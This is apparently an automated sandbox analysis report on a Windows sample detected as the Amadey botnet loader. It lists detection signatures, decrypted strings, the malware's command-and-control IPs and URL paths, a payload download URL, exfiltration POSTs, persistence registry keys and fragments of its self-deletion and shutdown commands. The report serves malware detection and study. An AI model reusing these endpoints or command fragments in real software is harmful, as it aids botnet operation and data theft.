Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1470923
MD5: 233ea23b1c1587f1cf895f08ba6da10b
SHA1: e2b5131d03aa3bc56a004ba6debc6d57322e0691
SHA256: c7e20eafa32a38282616d78c43c574991d30fe2fbc876141fa76e5ff538c3b5c
Tags: exe

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadey's stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 3916 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 233EA23B1C1587F1CF895F08BA6DA10B)
    • WerFault.exe (PID: 508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 728 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 780 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 856 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3300 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 864 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6244 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 912 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 912 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1040 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1048 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1180 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1204 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • Hkbsse.exe (PID: 1924 cmdline: "C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe" MD5: 233EA23B1C1587F1CF895F08BA6DA10B)
      • WerFault.exe (PID: 2720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 476 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1212 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • Hkbsse.exe (PID: 6912 cmdline: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe MD5: 233EA23B1C1587F1CF895F08BA6DA10B)
    • WerFault.exe (PID: 1408 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 536 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 556 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 532 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.209.162.226/hb9IvshS03/index.php", "Version": "4.41"}
Source | Rule | Description | Author | Strings
00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x1340:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000017.00000002.2275264775.0000000002891000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x11f0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000021.00000002.2879671000.0000000002B63000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x1500:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000021.00000003.2753930004.0000000004580000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000017.00000003.2238394423.0000000004530000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

Source | Rule | Description | Author | Strings
23.3.Hkbsse.exe.4530000.0.raw.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
23.2.Hkbsse.exe.400000.0.raw.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
23.3.Hkbsse.exe.4530000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
33.3.Hkbsse.exe.4580000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
0.2.file.exe.44c0e67.1.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
No Sigma rule has matched

Timestamp: 07/10/24-17:36:06.824712
SID: 2856147
Source Port: 49725
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/10/24-17:36:11.618807
SID: 2856122
Source Port: 80
Destination Port: 49729
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/10/24-17:36:13.149160
SID: 2044696
Source Port: 49734
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: 23.2.Hkbsse.exe.400000.0.unpack | Malware Configuration Extractor: Amadey {"C2 url": "185.209.162.226/hb9IvshS03/index.php", "Version": "4.41"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: 185.208.158.116
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: /hb9IvshS01/index.php
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: 89.23.103.42
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: /hb9IvshS02/index.php
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: 185.209.162.226
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: /hb9IvshS03/index.php
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: S-%lu-
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: 3bca58cece
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Hkbsse.exe
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Startup
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: cmd /C RMDIR /s/q
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: rundll32
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Programs
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: %USERPROFILE%
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: cred.dll|clip.dll|
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: cred.dll
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: clip.dll
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: http://
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: https://
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: /quiet
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: /Plugins/
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: &unit=
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: shell32.dll
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: kernel32.dll
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: GetNativeSystemInfo
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: ProgramData\
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: AVAST Software
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Kaspersky Lab
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Panda Security
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Doctor Web
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: 360TotalSecurity
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Bitdefender
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Norton
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Sophos
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Comodo
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: WinDefender
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: 0123456789
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: ------
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: ?scr=1
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: ComputerName
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: -unicode-
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: VideoID
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: DefaultSettings.XResolution
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: DefaultSettings.YResolution
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: ProductName
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: CurrentBuild
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: rundll32.exe
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: "taskkill /f /im "
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: " && timeout 1 && del
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: && Exit"
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: " && ren
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: Powershell.exe
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: -executionpolicy remotesigned -File "
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: shutdown -s -t 0
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: random
Source: 23.2.Hkbsse.exe.400000.0.unpack | String decryptor: 6HiB\%

Compliance

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Unpacked PE file: 23.2.Hkbsse.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Unpacked PE file: 33.2.Hkbsse.exe.400000.0.unpack
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0043DCB0 FindFirstFileExW,0_2_0043DCB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_044FDF17 FindFirstFileExW,0_2_044FDF17
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_0043DCB0 FindFirstFileExW,23_2_0043DCB0
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_044BDF17 FindFirstFileExW,23_2_044BDF17
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_0043DCB0 FindFirstFileExW,33_2_0043DCB0
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_0454DF17 FindFirstFileExW,33_2_0454DF17

Networking

Source: Traffic | Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:49725 -> 185.208.158.116:80
Source: Traffic | Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 89.23.103.42:80 -> 192.168.2.6:49729
Source: Traffic | Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.6:49734 -> 89.23.103.42:80
Source: Malware configuration extractor | IPs: 185.209.162.226
Source: global traffic | HTTP traffic detected: GET /am/random.exe HTTP/1.1 | Host: fellzobr.com
Source: global traffic | HTTP traffic detected: POST /hb9IvshS01/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.208.158.116 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /hb9IvshS02/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 89.23.103.42 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.209.162.226 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.209.162.226 | Content-Length: 160 | Cache-Control: no-cache | Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 | Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Source: global traffic | HTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.209.162.226 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /hb9IvshS02/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 89.23.103.42 | Content-Length: 160 | Cache-Control: no-cache | Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 | Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Source: global traffic | HTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.209.162.226 | Content-Length: 160 | Cache-Control: no-cache | Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 | Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Source: global traffic | HTTP traffic detected: POST /hb9IvshS01/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.208.158.116 | Content-Length: 160 | Cache-Control: no-cache | Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 | Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Source: global traffic | HTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.209.162.226 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /hb9IvshS02/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 89.23.103.42 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 30 30 30 30 34 30 38 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1000004081&unit=246122658369
Source: global traffic | HTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.209.162.226 | Content-Length: 160 | Cache-Control: no-cache | Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 | Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Source: global traffic | HTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.209.162.226 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /hb9IvshS01/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.208.158.116 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: SIMPLECARRER2IT
Source: Joe Sandbox View | ASN Name: MAXITEL-ASRU
Source: Joe Sandbox View | ASN Name: HOSTING-SOLUTIONSUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.103.42
Source: unknown | TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown | TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A9D9 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,0_2_0040A9D9
Source: global traffic | HTTP traffic detected: GET /am/random.exe HTTP/1.1 | Host: fellzobr.com
Source: global traffic | DNS traffic detected: DNS query: fellzobr.com
Source: unknown | HTTP traffic detected: POST /hb9IvshS01/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.208.158.116 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2880475527.0000000005820000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php
Source: Hkbsse.exe, 00000021.00000002.2880475527.0000000005820000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php16
Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002C27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpd
Source: Hkbsse.exe, 00000021.00000002.2880475527.0000000005820000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpq
Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BD2000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002C27000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2880475527.0000000005820000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.php
Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.phpm
Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.php
Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.phpj8
Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fellzobr.com/
Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BD2000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fellzobr.com/am/random.exe
Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fellzobr.com/am/random.exem-urlencodedB
Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fellzobr.com/am/random.exen
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2

System Summary

Source: 00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.2275264775.0000000002891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000021.00000002.2879671000.0000000002B63000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000021.00000002.2880062670.0000000004510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041CCA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 23_2_0041CCA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers
Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe | Code function: 33_2_0041CCA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\Hkbsse.job
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004099D0
